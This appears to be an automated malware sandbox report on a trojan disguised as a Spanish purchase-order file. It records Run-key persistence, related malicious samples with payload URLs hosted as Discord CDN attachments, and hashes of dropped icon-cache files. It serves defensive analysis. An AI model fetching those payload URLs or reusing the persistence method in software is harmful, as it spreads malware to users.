Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/35@8/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 64.7% (good quality ratio 59.2%) Quality average: 71.7% Quality standard deviation: 31.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 66 Number of non-executed functions: 180
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:51:19	API Interceptor	1x Sleep call for process: Se adjunta el pedido, proforma.exe modified
16:51:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lxtcsmeg C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url
16:51:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lxtcsmeg C:\Users\user\Contacts\Lxtcsmeg\gemsctxL.url
16:51:46	API Interceptor	2x Sleep call for process: Lxtcsmeg.exe modified
16:52:51	API Interceptor	117x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.130.233	MSQNZmmg2F.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
	b7cwlpwH6S.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	yH8giB6jJ2.exe	Get hash	malicious	Browse	162.159.135.233
	AO7gki3UTr.exe	Get hash	malicious	Browse	162.159.129.233
	Purchase Order.exe	Get hash	malicious	Browse	162.159.133.233
	New PO.exe	Get hash	malicious	Browse	162.159.130.233
	test.vbs	Get hash	malicious	Browse	162.159.135.233
	Racun je u prilogu.exe	Get hash	malicious	Browse	162.159.129.233
	PROPOSAL CATALOG.exe	Get hash	malicious	Browse	162.159.129.233
	cJ2wN3RKmh.exe	Get hash	malicious	Browse	162.159.130.233
	J73PTzDghy.exe	Get hash	malicious	Browse	162.159.134.233
	PO201808143_330542IMG_20200710_0008.rtf	Get hash	malicious	Browse	162.159.134.233
	ORDER 759325.exe	Get hash	malicious	Browse	162.159.133.233
	pH7pQDWJPP.exe	Get hash	malicious	Browse	162.159.134.233
	xzmHphquAP.exe	Get hash	malicious	Browse	162.159.133.233
	qG92QcOmb4.exe	Get hash	malicious	Browse	162.159.129.233
	CheatValorant2.2.exe	Get hash	malicious	Browse	162.159.133.233
	copy_tt_inv_10192ne.exe	Get hash	malicious	Browse	162.159.129.233
	New Order.exe	Get hash	malicious	Browse	162.159.133.233
	Notificacion Juristas Y Asociados S A..exe	Get hash	malicious	Browse	162.159.129.233
	MT103 Payment_Advice.exe	Get hash	malicious	Browse	162.159.135.233
	DgKlFNcwzT.exe	Get hash	malicious	Browse	162.159.133.233

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Google_Play_Store_flow_split.apk	Get hash	malicious	Browse	104.21.4.48
	Statement.html	Get hash	malicious	Browse	104.16.18.94
	Employee payment plan.HTM	Get hash	malicious	Browse	104.18.10.207
	S9yf6BkjhTQUbHE.exe	Get hash	malicious	Browse	172.67.178.31
	Halbank Ekstre 2021101 073653 270424.exe	Get hash	malicious	Browse	172.67.188.154
	yH8giB6jJ2.exe	Get hash	malicious	Browse	162.159.135.233
	pwY5ozOzpY	Get hash	malicious	Browse	172.64.209.6
	Zr26f1rL6r.exe	Get hash	malicious	Browse	104.21.76.223
	VXsVZBllD099876.exe	Get hash	malicious	Browse	172.67.206.244
	OPKyR75fJn.exe	Get hash	malicious	Browse	104.21.50.241
	COMPROBANTE DE CONSIGNACION #0000012992-882383393293293.vbs	Get hash	malicious	Browse	172.67.68.88
	DOC20212411003001001.exe	Get hash	malicious	Browse	104.21.19.200
	V-M RTAmpcapital5EG1-TGQO2F-IOC8.htm	Get hash	malicious	Browse	104.16.19.94
	AO7gki3UTr.exe	Get hash	malicious	Browse	162.159.129.233
	6docs'pdf.ppam	Get hash	malicious	Browse	104.16.202.237
	Product Inquiry.exe	Get hash	malicious	Browse	66.235.200.147
	JUSTIFICANTE.exe	Get hash	malicious	Browse	104.21.29.122
	Purchase Order.exe	Get hash	malicious	Browse	162.159.133.233
	Swift Copy TT.doc	Get hash	malicious	Browse	23.227.38.74
	sfhJLQhj84.exe	Get hash	malicious	Browse	104.23.98.190

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2255.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	7416
Entropy (8bit):	0.3690934870672516
Encrypted:	false
SSDEEP:	6:Gl/AdJDJXXmx2aRCXRSGZ0dX4Pml7JxdX3Qn5GSoX:nXmfoAt4SjSo
MD5:	EFE1EF8D49A078356EF93D6F465D7A32
SHA1:	17C132ED446DEBD8624B6721350D8E1FD953DCA8
SHA-256:	BD093DB2C402E692989852B344F2E66546C31B1429354230A8EF02CF572FA10D
SHA-512:	AE6297DD17E7BED0F43E532CD2C8FCFED65DFDE8FDA143CD51490558548EBC0E42359B5DD90E1F339E89A55F3686746EED2B426F1C5F00FFBF91F19A3098F439
Malicious:	false
Reputation:	unknown
Preview:	..0 IMMM ...............e.................................................................................................................................................................................................................................................................................................................................................-.... .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2285.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:a/l/:e/
MD5:	F732BF1006B6529CFFBA2B9F50C4B07F
SHA1:	D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
SHA-256:	77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
SHA-512:	064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn22C4.tmpni (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:J:J
MD5:	DB7C049E5E4E336D76D5A744C28C54C8
SHA1:	A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
SHA-256:	E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
SHA-512:	B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn22F4.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:EX:EX
MD5:	FC94FE7BD3975E75CEFAD79F5908F7B3
SHA1:	78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
SHA-256:	EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
SHA-512:	4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2324.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:V/l/:/
MD5:	5F243BF7CC0A348B6D31460A91173E71
SHA1:	5696B34625F027EC01765FC2BE49EFCFD882BF8E
SHA-256:	1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
SHA-512:	9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2325.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:6:6
MD5:	379523B9F5D5B954E719B664846DBF8F
SHA1:	930823EC80B85EDD22BAF555CAD21CDF48F066AA
SHA-256:	3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
SHA-512:	ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2326.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:lX:1
MD5:	2D84AD5CFDF57BD4E3656BCFD9A864EA
SHA1:	B7B82E72891E16D837A54F94960F9B3C83DC5552
SHA-256:	D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
SHA-512:	0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2356.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:A/lll:A/
MD5:	635E15CB045FF4CF0E6A31C827225767
SHA1:	F1EAAA628678441481309261FABC9D155C0DD6CB
SHA-256:	67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
SHA-512:	81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2357.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:5l:7
MD5:	2DD3F3C33E7100EC0D4DBBCA9774B044
SHA1:	B254D47F2B9769F13B033CAE2B0571D68D42E5EB
SHA-256:	5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
SHA-512:	C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2358.tmp. (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:Wtl:WX
MD5:	D192F7C343602D02E3E020807707006E
SHA1:	82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
SHA-256:	BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
SHA-512:	AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn2359.tmp. (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:7/lll:x
MD5:	F6B463BE7B50F3CC5D911B76002A6B36
SHA1:	C94920D1E0207B0F53D623A96F48D635314924D2
SHA-256:	16E4D1B41517B48CE562349E3895013C6D6A0DF4FCFFC2DA752498E33C4D9078
SHA-512:	4D155DFEDD3D44EDFBBE7AC84D3E81141D4BB665399C2A5CF01605C24BD12E6FAF87BB5B666EA392E1B246005DFABDE2208ED515CD612D34BAC7F965FD6CC57E
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn235A.tmp (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:s:s
MD5:	2A8875D2AF46255DB8324AAD9687D0B7
SHA1:	7A066FA7B69FB5450C26A1718B79AD27A9021CA9
SHA-256:	54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
SHA-512:	2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn235B.tmpes (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.13705611797272224
Encrypted:	false
SSDEEP:	96:SpB1xeXXDvNhawwlYCjoEe7b1tfp9Z8vrehrc9+:oB6jvNYzlYCcEe7b1tR9Z8DehQ
MD5:	0E111D58DF1823FEE135675DAD6D696D
SHA1:	FF8B193D25F5C23F599A2DDA34796BA92EC48DBD
SHA-256:	9F9CDC0B9E12156D5905DE8D23414AD97AF1A8417A8E6B928AEC651D4D8260A4
SHA-512:	BEAB9E67E033E1FEFC0AF76289F883631E454458AA4D940A057FC15A8478F8E62CE5F8A1B4D4BA23B15BE74E4255988A97A78A990E1486819305AB25C560694B
Malicious:	false
Reputation:	unknown
Preview:	CMMM ................I..CMMM.$........M ........$..0...0........\|e..;Rl..1m.?W4.d.b.e.9.1.9.3.9.a.1.b.a.9.e.0...BM.$..........\|...0...0..... ......................................... niW......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~...~.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn235C.tmpes (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.08685738674708272
Encrypted:	false
SSDEEP:	96:3dovsFQWdUC/zKahhFgNnAK66jIUJN2pY4RIYNSuQB/U85b:3WEFtLy0u42YNSuQBsub
MD5:	FCEFFDC4880499DA79BD462D9A8E4A5E
SHA1:	A1BB08958A467D5F1BA843C10D26EA05082022F6
SHA-256:	FA10133E447AAA16356F1DA68B87320F38C009D7D45FD92DE427395FB9F788D8
SHA-512:	8915D869969BDD77D869963BDFB67F695A0E81D60378A1E510E99DB15FAF855B0C1AA762A204B0108118173AAAD8F5833D25BCC75F4BC4A64B54DDFC8A5AF33E
Malicious:	false
Reputation:	unknown
Preview:	CMMM ................2..CMMM......-.... ........... ... .......'.y0.;._..D.%...b.a.e.2.e.e.c.e.1.d.2.d.9.d.b.a...BM............\|... ... ..... ......................................... niW..................................................................................................................................................................................................................................{..........................................................................................................................\0...a......................................................................................................................qJ..^1..zU......................................................................................................................_2.._2.._2....................................................................................................................a3..a3..a3..a3........a3.........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete\icn238C.tmpes (copy) Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.408222675578688
Encrypted:	false
SSDEEP:	3:d:d
MD5:	419A089E66B9E18ADA06C459B000CB4D
SHA1:	ED2108A58BA73AC18C3D2BF0D8C1890C2632B05A
SHA-256:	C48E42E9AB4E25B92C43A7B0416D463B9FF7C69541E4623A39513BC98085F424
SHA-512:	BBD57BEA7159748E1B13B3E459E2C8691A46BDC9323AFDB9DBF9D8F09511750D46A1D98C717C7ADCA07D79EDC859E925476DD03231507F37F45775C0A79A593C
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:5l:7
MD5:	2DD3F3C33E7100EC0D4DBBCA9774B044
SHA1:	B254D47F2B9769F13B033CAE2B0571D68D42E5EB
SHA-256:	5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
SHA-512:	C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.408222675578688
Encrypted:	false
SSDEEP:	3:d:d
MD5:	419A089E66B9E18ADA06C459B000CB4D
SHA1:	ED2108A58BA73AC18C3D2BF0D8C1890C2632B05A
SHA-256:	C48E42E9AB4E25B92C43A7B0416D463B9FF7C69541E4623A39513BC98085F424
SHA-512:	BBD57BEA7159748E1B13B3E459E2C8691A46BDC9323AFDB9DBF9D8F09511750D46A1D98C717C7ADCA07D79EDC859E925476DD03231507F37F45775C0A79A593C
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:A/lll:A/
MD5:	635E15CB045FF4CF0E6A31C827225767
SHA1:	F1EAAA628678441481309261FABC9D155C0DD6CB
SHA-256:	67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
SHA-512:	81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:7/lll:x
MD5:	F6B463BE7B50F3CC5D911B76002A6B36
SHA1:	C94920D1E0207B0F53D623A96F48D635314924D2
SHA-256:	16E4D1B41517B48CE562349E3895013C6D6A0DF4FCFFC2DA752498E33C4D9078
SHA-512:	4D155DFEDD3D44EDFBBE7AC84D3E81141D4BB665399C2A5CF01605C24BD12E6FAF87BB5B666EA392E1B246005DFABDE2208ED515CD612D34BAC7F965FD6CC57E
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:lX:1
MD5:	2D84AD5CFDF57BD4E3656BCFD9A864EA
SHA1:	B7B82E72891E16D837A54F94960F9B3C83DC5552
SHA-256:	D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
SHA-512:	0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.08685738674708272
Encrypted:	false
SSDEEP:	96:3dovsFQWdUC/zKahhFgNnAK66jIUJN2pY4RIYNSuQB/U85b:3WEFtLy0u42YNSuQBsub
MD5:	FCEFFDC4880499DA79BD462D9A8E4A5E
SHA1:	A1BB08958A467D5F1BA843C10D26EA05082022F6
SHA-256:	FA10133E447AAA16356F1DA68B87320F38C009D7D45FD92DE427395FB9F788D8
SHA-512:	8915D869969BDD77D869963BDFB67F695A0E81D60378A1E510E99DB15FAF855B0C1AA762A204B0108118173AAAD8F5833D25BCC75F4BC4A64B54DDFC8A5AF33E
Malicious:	false
Reputation:	unknown
Preview:	CMMM ................2..CMMM......-.... ........... ... .......'.y0.;._..D.%...b.a.e.2.e.e.c.e.1.d.2.d.9.d.b.a...BM............\|... ... ..... ......................................... niW..................................................................................................................................................................................................................................{..........................................................................................................................\0...a......................................................................................................................qJ..^1..zU......................................................................................................................_2.._2.._2....................................................................................................................a3..a3..a3..a3........a3.........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.13705611797272224
Encrypted:	false
SSDEEP:	96:SpB1xeXXDvNhawwlYCjoEe7b1tfp9Z8vrehrc9+:oB6jvNYzlYCcEe7b1tR9Z8DehQ
MD5:	0E111D58DF1823FEE135675DAD6D696D
SHA1:	FF8B193D25F5C23F599A2DDA34796BA92EC48DBD
SHA-256:	9F9CDC0B9E12156D5905DE8D23414AD97AF1A8417A8E6B928AEC651D4D8260A4
SHA-512:	BEAB9E67E033E1FEFC0AF76289F883631E454458AA4D940A057FC15A8478F8E62CE5F8A1B4D4BA23B15BE74E4255988A97A78A990E1486819305AB25C560694B
Malicious:	false
Reputation:	unknown
Preview:	CMMM ................I..CMMM.$........M ........$..0...0........\|e..;Rl..1m.?W4.d.b.e.9.1.9.3.9.a.1.b.a.9.e.0...BM.$..........\|...0...0..... ......................................... niW......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................~...~.

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:Wtl:WX
MD5:	D192F7C343602D02E3E020807707006E
SHA1:	82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
SHA-256:	BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
SHA-512:	AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:s:s
MD5:	2A8875D2AF46255DB8324AAD9687D0B7
SHA1:	7A066FA7B69FB5450C26A1718B79AD27A9021CA9
SHA-256:	54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
SHA-512:	2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:a/l/:e/
MD5:	F732BF1006B6529CFFBA2B9F50C4B07F
SHA1:	D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
SHA-256:	77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
SHA-512:	064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:EX:EX
MD5:	FC94FE7BD3975E75CEFAD79F5908F7B3
SHA1:	78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
SHA-256:	EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
SHA-512:	4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...................

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db Download File
Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	7416
Entropy (8bit):	0.3690934870672516
Encrypted:	false
